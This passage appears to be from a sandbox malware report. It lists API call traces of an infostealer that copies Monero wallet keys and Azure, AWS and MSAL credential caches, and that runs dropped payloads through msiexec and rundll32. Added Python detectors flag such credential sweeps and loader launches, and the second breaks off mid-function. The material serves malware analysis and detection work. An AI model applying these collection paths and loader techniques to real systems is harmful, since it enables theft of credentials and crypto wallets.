                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 005C5F4C
                        • InternetCloseHandle.WININET(00000000), ref: 005C5FB0
                        • InternetCloseHandle.WININET(00000000), ref: 005C5FBD
                        • HttpOpenRequestA.WININET(00000000,014B0D10,?,014B0588,00000000,00000000,00400100,00000000), ref: 005C5BF8
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • InternetCloseHandle.WININET(00000000), ref: 005C5FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: e71ca3db38200937afafaad1c96a13816c77b155f2c2349b5e4be998c875916c
                        • Instruction ID: 1e9eaa4dfef408164e72faf733744ab988606440bf2b0861190d2187a2f8c594
                        • Opcode Fuzzy Hash: e71ca3db38200937afafaad1c96a13816c77b155f2c2349b5e4be998c875916c
                        • Instruction Fuzzy Hash: 1A124272820119ABCB28EBA4DC99FEF7738BF54700F40419BF50662191EF702A89CF55
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005D8B60: GetSystemTime.KERNEL32(005E0E1A,014AFBA0,005E05AE,?,?,005C13F9,?,0000001A,005E0E1A,00000000,?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005D8B86
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005CCF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005CD0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005CD0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD208
                        • lstrcat.KERNEL32(?,005E1478), ref: 005CD217
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD22A
                        • lstrcat.KERNEL32(?,005E147C), ref: 005CD239
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD24C
                        • lstrcat.KERNEL32(?,005E1480), ref: 005CD25B
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD26E
                        • lstrcat.KERNEL32(?,005E1484), ref: 005CD27D
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD290
                        • lstrcat.KERNEL32(?,005E1488), ref: 005CD29F
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD2B2
                        • lstrcat.KERNEL32(?,005E148C), ref: 005CD2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD2D4
                        • lstrcat.KERNEL32(?,005E1490), ref: 005CD2E3
                          • Part of subcall function 005DA820: lstrlen.KERNEL32(005C4F05,?,?,005C4F05,005E0DDE), ref: 005DA82B
                          • Part of subcall function 005DA820: lstrcpy.KERNEL32(005E0DDE,00000000), ref: 005DA885
                        • lstrlen.KERNEL32(?), ref: 005CD32A
                        • lstrlen.KERNEL32(?), ref: 005CD339
                          • Part of subcall function 005DAA70: StrCmpCA.SHLWAPI(014A8BC8,005CA7A7,?,005CA7A7,014A8BC8), ref: 005DAA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 005CD3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 40bcaccdda318fa95a42673c73152cf4ff6ee2e704d1b8f4d407f80909f02d58
                        • Instruction ID: 1b9b8a1663c1012c482807c4d0e2e7ab55f37304c36528ac096019fc502f9f8e
                        • Opcode Fuzzy Hash: 40bcaccdda318fa95a42673c73152cf4ff6ee2e704d1b8f4d407f80909f02d58
                        • Instruction Fuzzy Hash: 0DE17371910109ABCB18EBA4DD9AEEF7B38BF54300F00415AF507B3291EE35AE45DB66
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,014AEFB0,00000000,?,005E144C,00000000,?,?), ref: 005CCA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005CCA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 005CCA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CCAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 005CCAD9
                        • StrStrA.SHLWAPI(?,014AEF08,005E0B52), ref: 005CCAF7
                        • StrStrA.SHLWAPI(00000000,014AEED8), ref: 005CCB1E
                        • StrStrA.SHLWAPI(?,014AF408,00000000,?,005E1458,00000000,?,00000000,00000000,?,014A8C58,00000000,?,005E1454,00000000,?), ref: 005CCCA2
                        • StrStrA.SHLWAPI(00000000,014AF5A8), ref: 005CCCB9
                          • Part of subcall function 005CC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005CC871
                          • Part of subcall function 005CC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005CC87C
                        • StrStrA.SHLWAPI(?,014AF5A8,00000000,?,005E145C,00000000,?,00000000,014A8AA8), ref: 005CCD5A
                        • StrStrA.SHLWAPI(00000000,014A89D8), ref: 005CCD71
                          • Part of subcall function 005CC820: lstrcat.KERNEL32(?,005E0B46), ref: 005CC943
                          • Part of subcall function 005CC820: lstrcat.KERNEL32(?,005E0B47), ref: 005CC957
                          • Part of subcall function 005CC820: lstrcat.KERNEL32(?,005E0B4E), ref: 005CC978
                        • lstrlen.KERNEL32(00000000), ref: 005CCE44
                        • CloseHandle.KERNEL32(00000000), ref: 005CCE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: f6ba9961e6a87f758b48420bb7b1d20f0a28ad40c79600df3a175b90eaa14edd
                        • Instruction ID: a86a547c0a97ba502d1c216397e9ac2e6df3f422c485abcc4cd9b164b3d81fce
                        • Opcode Fuzzy Hash: f6ba9961e6a87f758b48420bb7b1d20f0a28ad40c79600df3a175b90eaa14edd
                        • Instruction Fuzzy Hash: 78E11372900149ABDB28EBA8DC95FEF7B78BF54300F40415BF50667291EF306A4ACB65
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • RegOpenKeyExA.ADVAPI32(00000000,014ABBD0,00000000,00020019,00000000,005E05B6), ref: 005D83A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 005D8426
                        • wsprintfA.USER32 ref: 005D8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 005D847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D8499
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 63ae54b339333af73de01441abe952be700389a81b1bdbad9b58a45f020dbddf
                        • Instruction ID: 1223d434f4591c0e4a23b85a7f966247ffe641b06005ff94273f845df85e30f8
                        • Opcode Fuzzy Hash: 63ae54b339333af73de01441abe952be700389a81b1bdbad9b58a45f020dbddf
                        • Instruction Fuzzy Hash: 968110719102189BDB68DB54CC95FEA7BB8FF48700F0086DAE509A6280DF71AF85CF95
                        APIs
                          • Part of subcall function 005D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005D8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005D4DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 005D4DCD
                          • Part of subcall function 005D4910: wsprintfA.USER32 ref: 005D492C
                          • Part of subcall function 005D4910: FindFirstFileA.KERNEL32(?,?), ref: 005D4943
                        • lstrcat.KERNEL32(?,00000000), ref: 005D4E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 005D4E59
                          • Part of subcall function 005D4910: StrCmpCA.SHLWAPI(?,005E0FDC), ref: 005D4971
                          • Part of subcall function 005D4910: StrCmpCA.SHLWAPI(?,005E0FE0), ref: 005D4987
                          • Part of subcall function 005D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 005D4B7D
                          • Part of subcall function 005D4910: FindClose.KERNEL32(000000FF), ref: 005D4B92
                        • lstrcat.KERNEL32(?,00000000), ref: 005D4EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 005D4EE5
                          • Part of subcall function 005D4910: wsprintfA.USER32 ref: 005D49B0
                          • Part of subcall function 005D4910: StrCmpCA.SHLWAPI(?,005E08D2), ref: 005D49C5
                          • Part of subcall function 005D4910: wsprintfA.USER32 ref: 005D49E2
                          • Part of subcall function 005D4910: PathMatchSpecA.SHLWAPI(?,?), ref: 005D4A1E
                          • Part of subcall function 005D4910: lstrcat.KERNEL32(?,014B0D70), ref: 005D4A4A
                          • Part of subcall function 005D4910: lstrcat.KERNEL32(?,005E0FF8), ref: 005D4A5C
                          • Part of subcall function 005D4910: lstrcat.KERNEL32(?,?), ref: 005D4A70
                          • Part of subcall function 005D4910: lstrcat.KERNEL32(?,005E0FFC), ref: 005D4A82
                          • Part of subcall function 005D4910: lstrcat.KERNEL32(?,?), ref: 005D4A96
                          • Part of subcall function 005D4910: CopyFileA.KERNEL32(?,?,00000001), ref: 005D4AAC
                          • Part of subcall function 005D4910: DeleteFileA.KERNEL32(?), ref: 005D4B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 1da96b20ffa33b32e95394bf9e1581681fed16f99eb9f5a4421e65ca7f43315f
                        • Instruction ID: 314da0f1f71ee86508b60853d859b7a0ebc2b16fe1907282aa0d4c2e1ab529f2
                        • Opcode Fuzzy Hash: 1da96b20ffa33b32e95394bf9e1581681fed16f99eb9f5a4421e65ca7f43315f
                        • Instruction Fuzzy Hash: 92419579A4024867CB64F760EC5BFEE3B38BB64700F404495B585661C2FEB197C98B92
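The two function traces above describe one collection pattern. The first copies \Monero\wallet.keys (CopyFileA at 005CCF83, DeleteFileA at 005CD3B4 once the copy is no longer needed); the second walks \.azure\, \.aws\ and \.IdentityService\ under the profile folder returned by SHGetFolderPathA, matches msal.cache and *.* with PathMatchSpecA, and again CopyFileA/DeleteFileA each hit. What distinguishes this from a legitimate tool is that one process touches several unrelated credential stores within seconds. The detector below is an added example written for this page, not code from the Joe Sandbox report or from the sample: the event format (ts|pid|image|op|path), the sample events, the file names under .azure, and the 30-second/2-family thresholds are all constructed assumptions to be tuned against real file-access telemetry.

```python
# Added detection example (not from the Joe Sandbox report or the sample):
# flag a process that touches several distinct credential stores within a
# short window. Store families follow the path strings in the traces above.
# Event format and sample events are constructed for this example.
import re
from collections import defaultdict
from dataclasses import dataclass

# Path patterns for the credential stores named in the report, matched
# against a lower-cased path with backslash separators.
STORE_PATTERNS = {
    "monero_wallet": re.compile(r"\\monero\\.*wallet\.keys$"),
    "azure_cli":     re.compile(r"\\\.azure\\"),
    "aws_cli":       re.compile(r"\\\.aws\\"),
    "msal_cache":    re.compile(r"\\\.identityservice\\|msal\.cache$"),
}

@dataclass
class FileEvent:
    ts: float       # event time, seconds
    pid: int
    image: str      # image path of the accessing process
    op: str         # "read", "copy" or "delete"
    path: str       # file that was read/copied/deleted

def classify(path):
    """Return the store families a path belongs to (usually zero or one)."""
    norm = path.replace("/", "\\").lower()
    return [name for name, rx in STORE_PATTERNS.items() if rx.search(norm)]

def parse_log(text):
    """Parse constructed 'ts|pid|image|op|path' lines into FileEvents."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, pid, image, op, path = line.split("|", 4)
            events.append(FileEvent(float(ts), int(pid), image, op, path))
    return events

def find_collectors(events, window=30.0, min_families=2):
    """Return {pid: sorted family names} for every process that touched at
    least `min_families` distinct stores within `window` seconds. A tool
    reading only its own store (aws.exe under ~/.aws) never trips this."""
    touches = defaultdict(list)
    for ev in events:
        for fam in classify(ev.path):
            touches[ev.pid].append((ev.ts, fam))
    hits = {}
    for pid, seq in touches.items():
        seq.sort()
        for i, (t0, _) in enumerate(seq):
            fams = {fam for ts, fam in seq[i:] if ts - t0 <= window}
            if len(fams) >= min_families:
                hits[pid] = sorted(fams)
                break
    return hits

# Constructed sample: pid 4312 behaves like the sample (copies four stores
# in three seconds); pid 2200 is the AWS CLI reading only its own files.
SAMPLE_LOG = r"""
1700000000.0|4312|C:\Users\u\AppData\Local\Temp\file.exe|copy|C:\Users\u\Documents\Monero\wallet.keys
1700000001.2|4312|C:\Users\u\AppData\Local\Temp\file.exe|copy|C:\Users\u\.azure\msal_token_cache.bin
1700000001.9|4312|C:\Users\u\AppData\Local\Temp\file.exe|copy|C:\Users\u\.aws\credentials
1700000002.5|4312|C:\Users\u\AppData\Local\Temp\file.exe|copy|C:\Users\u\.IdentityService\msal.cache
1700000010.0|2200|C:\Program Files\Amazon\AWSCLIV2\aws.exe|read|C:\Users\u\.aws\credentials
1700000011.0|2200|C:\Program Files\Amazon\AWSCLIV2\aws.exe|read|C:\Users\u\.aws\config
"""

if __name__ == "__main__":
    for pid, fams in find_collectors(parse_log(SAMPLE_LOG)).items():
        print(f"pid {pid}: credential-store collection across {fams}")
```

The window matters more than the family list: the stealer finishes the whole sweep in a few seconds, while a developer's CLI tools touch one store each over a working day, so shrinking `window` reduces false positives before you need to whitelist images.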
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 005D906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: bfdcde7aed69b3ca511aebb63c101360c0ccaaf86de209a1453f9e1c96723578
                        • Instruction ID: 7fc125d8475648eeb4df944e984dee53475b1c1fe8d3aefd5b246f24b353ec94
                        • Opcode Fuzzy Hash: bfdcde7aed69b3ca511aebb63c101360c0ccaaf86de209a1453f9e1c96723578
                        • Instruction Fuzzy Hash: F271FD75A10209AFDB58DFE4DC89FEEBBB9BF48300F108519F515A7290DB34A905CB61
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005D31C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005D335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 005D34EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: e56eaff225ddf036b60bc95468bdfefd6c8e9a97b4f5ba2517036905f897d5c2
                        • Instruction ID: a1a86c104af4d4e65c63ca33c66e2431f4bcedba01a3b18d24c29cb43d77bdb8
                        • Opcode Fuzzy Hash: e56eaff225ddf036b60bc95468bdfefd6c8e9a97b4f5ba2517036905f897d5c2
                        • Instruction Fuzzy Hash: 2E1221718001499ADB29FBA4DC96FEEBB38BF54300F50415BF50666291EF702B8ACF56
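The function above is the sample's loader stage: three ShellExecuteEx calls whose string table holds C:\Windows\system32\msiexec.exe with `/i "` and ` /passive`, C:\Windows\system32\rundll32.exe, and the `.msi`/`.dll` suffixes, so a downloaded payload is run through a signed Microsoft binary rather than executed directly. The process-creation check below is an added example written for this page, not code from the Joe Sandbox report or the sample: the event fields, the sample events and the list of user-writable directories are constructed assumptions, and the rule deliberately keys on where the payload and the parent live rather than on msiexec/rundll32 themselves, which are far too common to alert on alone.

```python
# Added detection example (not from the Joe Sandbox report or the sample):
# flag msiexec.exe and rundll32.exe launches that match the loader strings
# above: `msiexec.exe /i "<dropped>.msi" /passive` and `rundll32.exe
# <dropped>.dll,...` where the payload sits in a user-writable directory.
# Event fields and sample events are constructed; USER_WRITABLE is an
# assumed list to tune per environment.
import re
from dataclasses import dataclass

MSI_RX = re.compile(r'/i\s+(?:"([^"]+\.msi)"|(\S+\.msi))', re.IGNORECASE)
DLL_RX = re.compile(r'(?:"([^"]+\.dll)"|(\S+?\.dll))(?=[\s,]|$)', re.IGNORECASE)
# Directories an unprivileged user can write to (assumed list).
USER_WRITABLE = re.compile(
    r"\\(appdata\\local\\temp|programdata|users\\[^\\]+\\downloads)\\",
    re.IGNORECASE)

@dataclass
class ProcEvent:
    pid: int
    image: str          # path of the new process
    cmdline: str
    parent_image: str   # path of the creating process

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def loader_verdict(ev):
    """Return a reason string if `ev` looks like a dropped-payload launch, else None."""
    exe = basename(ev.image)
    if exe == "msiexec.exe":
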